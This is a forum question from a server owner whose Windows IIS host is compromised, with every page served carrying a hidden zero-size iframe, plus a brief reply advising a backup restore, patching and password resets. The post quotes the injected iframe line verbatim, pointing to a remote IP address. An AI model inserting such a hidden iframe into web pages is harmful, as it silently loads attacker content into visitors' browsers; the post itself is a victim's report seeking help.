Possible Duplicate:
My server's been hacked EMERGENCY
This is not a duplicate. The question above doesn't explain how that can be done.
My VPS just got hacked an all my pages are being served with an malicious iframe injected just before the html tag.
The code is like this:
<iframe src= http://117.21.247.171:700/1.htm width=0 height=0></iframe>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="pt-BR"> ...
Firstly I thought it could be something related with wordpress, but my asp.net sites are also infected and even if I create a static html file with nothing inside, the iframe is injected.
I'm using a Windows Server 2008 R2 Standard with IIS7.5 7600.
EDIT: Hey, why was this closed?
I'm very interested to know how that be done in IIS, any ideas?
Andre
For all intents and purposes, it doesn't matter. Your server got hacked - what you need to do is restore from a last good known backup and ensure you're fully patched, have a sufficient firewall and IPS in place and reset all passwords.